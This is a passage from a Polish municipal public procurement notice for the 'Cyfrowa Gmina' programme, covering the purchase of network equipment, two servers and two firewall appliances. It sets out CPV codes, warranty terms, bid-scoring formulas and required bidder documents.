muszą być, wolne od wad fizycznych i prawnych, wolne od praw osób trzecich oraz nie mogą być przedmiotem żadnego postępowania i zabezpiecze-nia.<br/>1.5. Za termin realizacji przedmiotu umowy uznaje się datę wskazaną w protokole odbioru końcowego przedmiotu umowy, podpisanego przez Zamawiającego oraz Wykonawcę<br/>1.6.Zamówienie realizowane jest w ramach dofinansowania w ramach Programu Operacyj-nego Polska Cyfrowa na lata 2014-2020 Osi Priorytetowej V Rozwój cyfrowy JST oraz wzmoc-nienie cyfrowej odporności na zagrożenia REACT-EU działania 5.1 Rozwój cyfrowy JST oraz wzmocnienie cyfrowej odporności na zagrożenia dotycząca realizacji projektu grantowego „Cyfrowa Gmina” zgodnie z Wytycznymi zawartymi w przedmiotowym Programie, Wyko-nawcę obowiązują zapisy obowiązujące w przedmiotowym programie<br/>2. Gwarancja<br/>2.1 Szczegółowy opis informacji dotyczących okresu gwarancji opisano w § 5 projektu umo-wy – załącznik nr 3 do SWZ.<br/>2.2 Wykonawca udziela Zamawiającemu gwarancji na cały przedmiot umowy tj. dostawy stanowiące przedmiot umowy.<br/>2.3 Termin gwarancji na dostawy stanowi jedno z kryteriów oceny ofert i ustala się na okres zgodny z zaproponowanym przez Wykonawcę w treści złożonej oferty.<br/>2.4 Wykonawca może zaproponować okres gwarancji zaoferowany w ofercie w zakresie min. 24 miesięcy - max. 36 miesięcy.<br/>3.	kod CPV	<br/>Główny kod CPV: <br/>32420000-3 Urządzenia sieciowe <br/>Dodatkowe kody CPV: <br/>32410000-0 Lokalna sieć komputerowa<br/>48000000-8 Pakiety oprogramowania i systemy informatyczne </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">32420000-3 - Urządzenia sieciowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">32410000-0 - Lokalna sieć komputerowa</p> <p class="mb-0">48000000-8 - Pakiety oprogramowania i systemy informatyczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryteria i sposób oceny oferty<br/>- cena,<br/>- okres gwarancji na sprzęt i urządzenia<br/>Kryterium – „Cena”<br/>Kryterium – „Cena” będzie oceniane na podstawie ceny brutto przedmiotu zamówienia zawartej w ofercie, a ilość punktów obliczana będzie według poniższego wzoru:<br/>C = WP x Cnaj/cof <br/>gdzie:<br/>C – liczba punktów przyznanych ocenianej ofercie w kryterium „Cena”<br/>WP – waga dla kryterium „Cena” 60 pkt<br/>Cnaj – najniższa cena brutto zaoferowana w przetargu nie podlegająca odrzuceniu- dzielna<br/>Cof – cena brutto zawarta w ocenianej ofercie – dzielnik<br/>Kryterium – okres gwarancji na sprzęt i urządzenia<br/>1) okres gwarancji na sprzęt i urządzenia liczony jest w miesiącach;<br/>2) minimalny okres gwarancji na sprzęt i urządzenia wynosi 24 miesięcy - w przypadku zaoferowania przez Wykonawcę okresu gwarancji na sprzęt i urządzenia krótszego niż 24 miesięcy Zamawiający ofertę odrzuci. W przypadku, gdy Wykonawca w ogóle nie wskaże w ofercie oferowanego okresu gwarancji na sprzęt i urządzenia zamawiający przyjmie, że Wykonawca nie oferuje gwarancji na sprzęt i urządzenia i ofertę odrzuci;<br/>3) maksymalny okres rękojmi i gwarancji wynosi 36 miesiące - wskazany w formularzu ofertowym okres gwarancji na sprzęt i urządzenia powyżej 36 miesięcy liczony będzie jako okres gwarancji na sprzęt i urządzenia 36 miesiące;<br/>4) Wykonawcy oferują długość okresu gwarancji na sprzęt i urządzenia w pełnych miesiącach;<br/>5) ocena punktowa oferty nie podlegającej odrzuceniu w tym kryterium zostanie przeprowadzona zgodnie z następującą formułą:<br/>G = ( ((Robliczana-Rmin))/((Rmax-Rmin) ) ) x Wmax<br/>G– wartość punktowa, którą należy wyznaczyć<br/>Wmax – waga kryterium – maksymalna liczba punktów, która może być przyznana w danym kryterium tj. 40 pkt.<br/>G min – wartość najniższa spośród złożonych ofert wykonawców nie podlegających odrzuceniu tj, 24 miesięcy<br/>G max – wartość najwyższa spośród złożonych ofert wykonawców nie podlegających odrzuceniu tj. 36 miesiące<br/>G obliczana – wartość obliczana w danym kryterium – wartość zaoferowana przez Wykonawcę nie podlegającego odrzuceniu<br/>(Robliczalna-Rmin) – dzielna<br/>(Rmax-Rmin) – dzielnik<br/>Sposób oceny ofert<br/>Oferta, która otrzyma największą, łączną ilość punktów uznana zostanie za najkorzystniejszą.<br/>Ocena ogólna poszczególnych ofert dokonywana będzie w oparciu o poniższą formułę:<br/>S = C + G <br/>gdzie:<br/>S – oznacza łączną oceną jako sumę punktów w poszczególnych kryteriach<br/>C – liczba punktów uzyskanych w kryterium - cena <br/>G – liczba punktów uzyskanych w kryterium - okres gwarancji</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji na sprzęt i urządzenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> III. Część 3 - Dostawy i usługi w ramach Programu Operacyjnego Polska Cyfrowa na lata 2014-2020 Osi Priorytetowej V Rozwój cyfrowy JST oraz wzmocnienie cyfrowej odporności na zagrożenia REACT-EU - zakup i dostawa dwóch serwerów wraz z oprogramowaniem Windows Serwer 2022 <br/>zgodnie z <br/>–	Załącznikiem_Nr_4.3A_ Opis przedmiotu zamówienia Część 3 <br/>–	Załącznikiem_Nr_4.3B_ Opis przedmiotu zamówienia Część 3 <br/>1.1. Na planowany zakup, materiałów i urządzeń wyspecyfikowanych należy każdorazowo uzyskać akceptację od Zamawiającego	.<br/>1.2. Wykonawca zobowiązany jest do dokładnego sprawdzenia ilości robót z uwagi na to, że umowa na dostawy będzie umową ryczałtową. <br/>1.3. W przypadku, wskazania w opisie przedmiotu zamówienia, w załączniku do oferty, w projekcie znaku towarowego, patentu lub pochodzenia, źródła lub szczególnego procesu, któ-ry charakteryzuje produkty lub usługi służy to jedynie celom identyfikacyjnym. Nazwy stano-wią jedynie precyzyjne określenie klasy oraz parametrów technicznych produktów wymaga-nych przez Zamawiającego i mają charakter wyłącznie przykładowy. W myśl art. 99 ust.5 ustawy Prawo zamówień publicznych, Zamawiający dopuszcza możliwość składania w tym zakresie ofert jakościowo równoważnych, spełniających równoważne parametry określone w opisie. Przez produkt równoważny Zamawiający rozumie produkt, o parametrach takich sa-mych bądź lepszych w stosunku do zaproponowanego produktu czy urządzenia oraz zgodny z dokumentacją opisującą przedmiot zamówienia oraz produkt, odpowiadający zastosowanym rozwiązaniom technologicznym. Zaoferowane urządzenia i materiały równoważne, muszą posiadać stosowne wymagane przepisami prawa atesty lub dopuszczenia do obrotu gospo-darczego tak, aby Zamawiający mógł sprawdzić, czy odpowiadają one wymaganiom posta-wionym w Specyfikacji Warunków Zamówienia. W takiej sytuacji Zamawiający wymaga udowodnienia przez Wykonawcę tego faktu, a w szczególności złożenia stosownych doku-mentów, potwierdzających, że te materiały lub urządzenia są równoważne<br/>1.4 Wszystkie oferowane materiały muszą być, wolne od wad fizycznych i prawnych, wolne od praw osób trzecich oraz nie mogą być przedmiotem żadnego postępowania i zabezpiecze-nia.<br/>1.5. Za termin realizacji przedmiotu umowy uznaje się datę wskazaną w protokole odbioru końcowego przedmiotu umowy, podpisanego przez Zamawiającego oraz Wykonawcę<br/>1.6. Zamówienie realizowane jest w ramach dofinansowania w ramach Programu Opera-cyjnego Polska Cyfrowa na lata 2014-2020 Osi Priorytetowej V Rozwój cyfrowy JST oraz wzmocnienie cyfrowej odporności na zagrożenia REACT-EU działania 5.1 Rozwój cyfrowy JST oraz wzmocnienie cyfrowej odporności na zagrożenia dotycząca realizacji projektu grantowe-go „Cyfrowa Gmina” zgodnie z Wytycznymi zawartymi w przedmiotowym Programie, Wyko-nawcę obowiązują zapisy obowiązujące w przedmiotowym programie<br/>2. Gwarancja<br/>2.1 Szczegółowy opis informacji dotyczących okresu gwarancji opisano w § 5 projektu umo-wy – załącznik nr 3 do SWZ.<br/>2.2 Wykonawca udziela Zamawiającemu gwarancji na cały przedmiot umowy tj. dostawy stanowiące przedmiot umowy.<br/>2.3 Termin gwarancji na dostawy stanowi jedno z kryteriów oceny ofert i ustala się na okres zgodny z zaproponowanym przez Wykonawcę w treści złożonej oferty.<br/>2.4 Wykonawca może zaproponować okres gwarancji zaoferowany w ofercie w zakresie min. 24 miesięcy - max. 36 miesięcy.<br/>3. kod CPV	<br/>Główny kod CPV: <br/>48800000-6 Serwery <br/>Dodatkowe kody CPV: <br/>48821000-9 Serwery sieciowe<br/>48822000-6 Serwery komputerowe <br/>48823000-3 Serwery plików <br/>72000000-5 Usługi informatyczne: konsultacyjne, opracowywania oprogramowania, interne-towe i wsparcia<br/>48000000-8 Pakiety oprogramowania i systemy informatyczne </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">48800000-6 - Systemy i serwery informacyjne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">48821000-9 - Serwery sieciowe</p> <p class="mb-0">48822000-6 - Serwery komputerowe</p> <p class="mb-0">48823000-3 - Serwery plików</p> <p class="mb-0">72000000-5 - Usługi informatyczne: konsultacyjne, opracowywania oprogramowania, internetowe i wsparcia</p> <p class="mb-0">48000000-8 - Pakiety oprogramowania i systemy informatyczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryteria i sposób oceny oferty<br/>- cena,<br/>- okres gwarancji na sprzęt i urządzenia<br/>- Kryterium jakościowe <br/>Kryterium – „Cena”<br/>Kryterium – „Cena” będzie oceniane na podstawie ceny brutto przedmiotu zamówienia zawartej w ofercie, a ilość punktów obliczana będzie według poniższego wzoru:<br/>C = WP x Cnaj/cof <br/>gdzie:<br/>C – liczba punktów przyznanych ocenianej ofercie w kryterium „Cena”<br/>WP – waga dla kryterium „Cena” 60 pkt<br/>Cnaj – najniższa cena brutto zaoferowana w przetargu nie podlegająca odrzuceniu- dzielna<br/>Cof – cena brutto zawarta w ocenianej ofercie – dzielnik<br/>Kryterium – okres gwarancji na sprzęt i urządzenia<br/>1) okres gwarancji na sprzęt i urządzenia liczony jest w miesiącach;<br/>2) minimalny okres gwarancji na sprzęt i urządzenia wynosi 24 miesięcy - w przypadku zaoferowania przez Wykonawcę okresu gwarancji na sprzęt i urządzenia krótszego niż 24 miesięcy Zamawiający ofertę odrzuci. W przypadku, gdy Wykonawca w ogóle nie wskaże w ofercie oferowanego okresu gwarancji na sprzęt i urządzenia zamawiający przyjmie, że Wykonawca nie oferuje gwarancji na sprzęt i urządzenia i ofertę odrzuci;<br/>3) maksymalny okres rękojmi i gwarancji wynosi 36 miesiące - wskazany w formularzu ofertowym okres gwarancji na sprzęt i urządzenia powyżej 36 miesięcy liczony będzie jako okres gwarancji na sprzęt i urządzenia 36 miesiące;<br/>4) Wykonawcy oferują długość okresu gwarancji na sprzęt i urządzenia w pełnych miesiącach;<br/>5) ocena punktowa oferty nie podlegającej odrzuceniu w tym kryterium zostanie przeprowadzona zgodnie z następującą formułą:<br/>G = ( ((Robliczana-Rmin))/((Rmax-Rmin) ) ) x Wmax<br/>G– wartość punktowa, którą należy wyznaczyć<br/>Wmax – waga kryterium – maksymalna liczba punktów, która może być przyznana w danym kryterium tj. 30 pkt.<br/>G min – wartość najniższa spośród złożonych ofert wykonawców nie podlegających odrzuceniu tj, 24 miesięcy<br/>G max – wartość najwyższa spośród złożonych ofert wykonawców nie podlegających odrzuceniu tj. 36 miesiące<br/>G obliczana – wartość obliczana w danym kryterium – wartość zaoferowana przez Wykonawcę nie podlegającego odrzuceniu<br/>(Robliczalna-Rmin) – dzielna<br/>(Rmax-Rmin) - dzielnik<br/>Kryterium jakościowe – ocena w tym kryterium polega na przyznaniu ofercie Wykonawcy dodatkowych punktów (max.10 pkt) w zależności od zaoferowanych parametrów technicz-nych dotyczących serwerów <br/>1.Wykonawca zaoferuje <br/> opcjonalne (dodatkowe) parametry techniczne dotyczące serwerów <br/>Funkcjonalność pamięci RAM - Memory Rank Sparing, Memory Mirror, Failed DIMM isola-tion, Memory Address Parity Protection, Memory Thermal Throttling - 5 pkt<br/>2.Wykonawca zaoferuje <br/> opcjonalne (dodatkowe) parametry techniczne dotyczące serwerów <br/>Wbudowany czujnik otwarcia obudowy współ-pracujący z BIOS i kartą zarządzającą.- 5 pkt<br/>Sposób oceny ofert<br/>Oferta, która otrzyma największą, łączną ilość punktów uznana zostanie za najkorzystniejszą.<br/>Ocena ogólna poszczególnych ofert dokonywana będzie w oparciu o poniższą formułę:<br/>S = C + G + J<br/>gdzie:<br/>S – oznacza łączną oceną jako sumę punktów w poszczególnych kryteriach<br/>C – liczba punktów uzyskanych w kryterium - cena <br/>G – liczba punktów uzyskanych w kryterium - okres gwarancji<br/>J – liczba punktów uzyskanych w kryterium – kryterium jakościowe</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji na sprzęt i urządzenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kryterium jakościowe</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> IV. Część 4 - Dostawy i usługi w ramach Programu Operacyjnego Polska Cyfrowa na lata 2014-2020 Osi Priorytetowej V Rozwój cyfrowy JST oraz wzmocnienie cyfrowej odporności na zagrożenia REACT-EU - zakup i dostawa rozbudowa dwóch sztuk zabezpieczeń logicznych - zgodnie z Załącznikiem _Nr 4 _4_Opis przedmiotu zamówienia do Części 4<br/>1.1. Na planowany zakup, materiałów i urządzeń wyspecyfikowanych należy każdorazowo uzyskać akceptację od Zamawiającego	.<br/>1.2. Wykonawca zobowiązany jest do dokładnego sprawdzenia ilości robót z uwagi na to, że umowa na dostawy będzie umową ryczałtową. <br/>1.3. W przypadku, wskazania w opisie przedmiotu zamówienia, w załączniku do oferty, w projekcie znaku towarowego, patentu lub pochodzenia, źródła lub szczególnego procesu, któ-ry charakteryzuje produkty lub usługi służy to jedynie celom identyfikacyjnym. Nazwy stano-wią jedynie precyzyjne określenie klasy oraz parametrów technicznych produktów wymaga-nych przez Zamawiającego i mają charakter wyłącznie przykładowy. W myśl art. 99 ust.5 ustawy Prawo zamówień publicznych, Zamawiający dopuszcza możliwość składania w tym zakresie ofert jakościowo równoważnych, spełniających równoważne parametry określone w opisie. Przez produkt równoważny Zamawiający rozumie produkt, o parametrach takich sa-mych bądź lepszych w stosunku do zaproponowanego produktu czy urządzenia oraz zgodny z dokumentacją opisującą przedmiot zamówienia oraz produkt, odpowiadający zastosowanym rozwiązaniom technologicznym. Zaoferowane urządzenia i materiały równoważne, muszą posiadać stosowne wymagane przepisami prawa atesty lub dopuszczenia do obrotu gospo-darczego tak, aby Zamawiający mógł sprawdzić, czy odpowiadają one wymaganiom posta-wionym w Specyfikacji Warunków Zamówienia. W takiej sytuacji Zamawiający wymaga udowodnienia przez Wykonawcę tego faktu, a w szczególności złożenia stosownych doku-mentów, potwierdzających, że te materiały lub urządzenia są równoważne<br/>1.4 Wszystkie oferowane materiały muszą być, wolne od wad fizycznych i prawnych, wolne od praw osób trzecich oraz nie mogą być przedmiotem żadnego postępowania i zabezpiecze-nia.<br/>1.5. Za termin realizacji przedmiotu umowy uznaje się datę wskazaną w protokole odbioru końcowego przedmiotu umowy, podpisanego przez Zamawiającego oraz Wykonawcę<br/>1.6. Zamówienie realizowane jest w ramach dofinansowania w ramach Programu Opera-cyjnego Polska Cyfrowa na lata 2014-2020 Osi Priorytetowej V Rozwój cyfrowy JST oraz wzmocnienie cyfrowej odporności na zagrożenia REACT-EU działania 5.1 Rozwój cyfrowy JST oraz wzmocnienie cyfrowej odporności na zagrożenia dotycząca realizacji projektu grantowe-go „Cyfrowa Gmina” zgodnie z Wytycznymi zawartymi w przedmiotowym Programie, Wyko-nawcę obowiązują zapisy obowiązujące w przedmiotowym programie<br/>2. Gwarancja<br/>2.1 Szczegółowy opis informacji dotyczących okresu gwarancji opisano w § 5 projektu umo-wy – załącznik nr 3 do SWZ.<br/>2.2 Wykonawca udziela Zamawiającemu gwarancji na cały przedmiot umowy tj. dostawy stanowiące przedmiot umowy.<br/>2.3 Termin gwarancji na dostawy stanowi jedno z kryteriów oceny ofert i ustala się na okres zgodny z zaproponowanym przez Wykonawcę w treści złożonej oferty.<br/>2.4 Wykonawca może zaproponować okres gwarancji zaoferowany w ofercie w zakresie min. 24 miesięcy - max. 36 miesięcy.<br/><br/>3. kod CPV	<br/>Główny kod CPV: <br/>32420000-3 Urządzenia sieciowe <br/>Dodatkowe kody CPV: <br/>32424000-1 Infrastruktura sieciowa<br/>32410000-0 Lokalna sieć komputerowa<br/>48000000-8 Pakiety oprogramowania i systemy informatyczne<br/>72000000-5 Usługi informatyczne: konsultacyjne, opracowywania oprogramowania, internetowe i wsparcia </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">32420000-3 - Urządzenia sieciowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">32424000-1 - Infrastruktura sieciowa</p> <p class="mb-0">32410000-0 - Lokalna sieć komputerowa</p> <p class="mb-0">48000000-8 - Pakiety oprogramowania i systemy informatyczne</p> <p class="mb-0">72000000-5 - Usługi informatyczne: konsultacyjne, opracowywania oprogramowania, internetowe i wsparcia</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">cena,<br/>- okres gwarancji na sprzęt i urządzenia<br/>- Kryterium jakościowe <br/>Kryterium – „Cena”<br/>Kryterium – „Cena” będzie oceniane na podstawie ceny brutto przedmiotu zamówienia zawartej w ofercie, a ilość punktów obliczana będzie według poniższego wzoru:<br/>C = WP x Cnaj/cof <br/><br/>gdzie:<br/>C – liczba punktów przyznanych ocenianej ofercie w kryterium „Cena”<br/>WP – waga dla kryterium „Cena” 60 pkt<br/>Cnaj – najniższa cena brutto zaoferowana w przetargu nie podlegająca odrzuceniu- dzielna<br/>Cof – cena brutto zawarta w ocenianej ofercie – dzielnik<br/>Kryterium – okres gwarancji na sprzęt i urządzenia<br/>1) okres gwarancji na sprzęt i urządzenia liczony jest w miesiącach;<br/>2) minimalny okres gwarancji na sprzęt i urządzenia wynosi 24 miesięcy - w przypadku zaoferowania przez Wykonawcę okresu gwarancji na sprzęt i urządzenia krótszego niż 24 miesięcy Zamawiający ofertę odrzuci. W przypadku, gdy Wykonawca w ogóle nie wskaże w ofercie oferowanego okresu gwarancji na sprzęt i urządzenia zamawiający przyjmie, że Wykonawca nie oferuje gwarancji na sprzęt i urządzenia i ofertę odrzuci;<br/>3) maksymalny okres rękojmi i gwarancji wynosi 36 miesiące - wskazany w formularzu ofertowym okres gwarancji na sprzęt i urządzenia powyżej 36 miesięcy liczony będzie jako okres gwarancji na sprzęt i urządzenia 36 miesiące;<br/>4) Wykonawcy oferują długość okresu gwarancji na sprzęt i urządzenia w pełnych miesiącach;<br/>5) ocena punktowa oferty nie podlegającej odrzuceniu w tym kryterium zostanie przeprowadzona zgodnie z następującą formułą:<br/>G = ( ((Robliczana-Rmin))/((Rmax-Rmin) ) ) x Wmax<br/>G– wartość punktowa, którą należy wyznaczyć<br/>Wmax – waga kryterium – maksymalna liczba punktów, która może być przyznana w danym kryterium tj. 30 pkt.<br/>G min – wartość najniższa spośród złożonych ofert wykonawców nie podlegających odrzuceniu tj, 24 miesięcy<br/>G max – wartość najwyższa spośród złożonych ofert wykonawców nie podlegających odrzuceniu tj. 36 miesiące<br/>G obliczana – wartość obliczana w danym kryterium – wartość zaoferowana przez Wykonawcę nie podlegającego odrzuceniu<br/>(Robliczalna-Rmin) – dzielna<br/>(Rmax-Rmin) - dzielnik<br/>Kryterium jakościowe – ocena w tym kryterium polega na przyznaniu ofercie Wykonawcy dodatkowych punktów (max.10 pkt) w zależności od parametrów zaoferowanych parame-trów technicznych dotyczących serwerów <br/>Wykonawca zaoferuje opcjonalne (dodatkowe) parametry techniczne dotyczące serwerów :<br/>1.System Firewall musi posiadać wbudowany port konsoli szeregowej oraz gniazdo USB umożliwiające podłączenie modemu 3G/4G oraz instalacji oprogramowania z klucza USB.-2pkt<br/>2.Możliwość wykorzystania w polityce bezpie-czeństwa zewnętrznych repozytoriów zawiera-jących: kategorie url, adresy IP, nazwy dome-nowe, hash&#39;e złośliwych plików.-2pkt<br/>3.IPSec VPN - Wsparcie dla Pracy w topologii Hub and Spoke oraz Mesh, w tym wsparcie dla dynamicznego zestawiania tuneli pomiędzy SPOKE w topologii HUB and SPOKE-2.pkt <br/>4.Funkcje SD-WAN - System powinien umożliwiać wykorzystanie protokołów dynamicznego rou-tingu przy konfiguracji równoważenia obciąże-nia do łączy WAN. Reguły SD-WAN powinny umożliwiać określenie aplikacji jako argumen-tu dla kierowania ruchu-2pkt.<br/>5.System musi zapewniać możliwość zarządzania pasmem dla wybranych kategorii URL.-2pkt<br/>Razem w kryterium Jakościowym -10 pkt<br/>Sposób oceny ofert<br/>Oferta, która otrzyma największą, łączną ilość punktów uznana zostanie za najkorzystniejszą.<br/>Ocena ogólna poszczególnych ofert dokonywana będzie w oparciu o poniższą formułę:<br/>S = C + G + J<br/>gdzie:<br/>S – oznacza łączną oceną jako sumę punktów w poszczególnych kryteriach<br/>C – liczba punktów uzyskanych w kryterium - cena <br/>G – liczba punktów uzyskanych w kryterium - okres gwarancji<br/>J – liczba punktów uzyskanych w kryterium – kryterium jakościowe</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji na sprzęt i urządzenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kryterium jakościowe</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego – Załącznik nr 5 do SWZ</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 9.1 Zamawiający wymaga aby Wykonawca wypełnił oraz dołączył do oferty szczegółowy opis przedmiotu zamówienia stanowiący Załącznik do Oferty nr 4.1, 4.2, 4.3A ,4.3B, 4.4 ( odpo-wiednio do części na które jest składana oferta) <br/>9.2 Zamawiający nie przewiduje uzupełnienia przedmiotowych środków dowodowych<br/>9.3 W przypadku niezłożenia wymaganego przedmiotowego środka dowodowego, oferta Wy-konawcy podlegać będzie odrzuceniu<br/>9.4 Instrukcja wypełnienia ww. załączników zostały zamieszczone pod szczegółowym określe-niem przedmiotu zamówienia ( pod tabelą) odpowiednio dla Załączników do Oferty nr 4.1, 4.2, 4.3A ,4.3B, 4.4 <br/>a) Niewypełnienie pozycji oznakowanej *) lub wypełnienie w sposób niejednoznaczny umoż-liwiający zweryfikowanie jaki sprzęt zaoferował Wykonawca, skutkować będzie odrzuceniem oferty na podstawie art.226 ust.1 pkt.5 ustawy PZP jako niezgodnej z warunkami zamówie-nia.<br/>b) Pozycję oznaczoną symbolem **) należy wypełnić w przypadku jeżeli oferowany towar posiada parametry inne, przynajmniej równoważne lub wyższe <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 8.1. Formularz ofertowy (załącznik nr 1 do SWZ do: Cześć 1, Część 2, Część 3, Części 4, wraz z załącznikami<br/>8.2. Oświadczenie, o którym mowa w pkt. 6 SWZ (załącznik nr 2 do SWZ). <br/>8.3. Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia - dotyczy ofert składanych przez Wyko-nawców wspólnie ubiegających się o udzielenie zamówienia. <br/>8.4. Pełnomocnictwo* dla osoby/osób podpisującej ofertę i oświadczenia (w sytuacji, gdy ofertę podpisuje osoba, której prawo do reprezentowania Wykonawcy nie wynika z doku-mentów załączonych do oferty). <br/>*Pełnomocnictwo należy złożyć w formie oryginału lub notarialnie poświadczonej kopii w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) 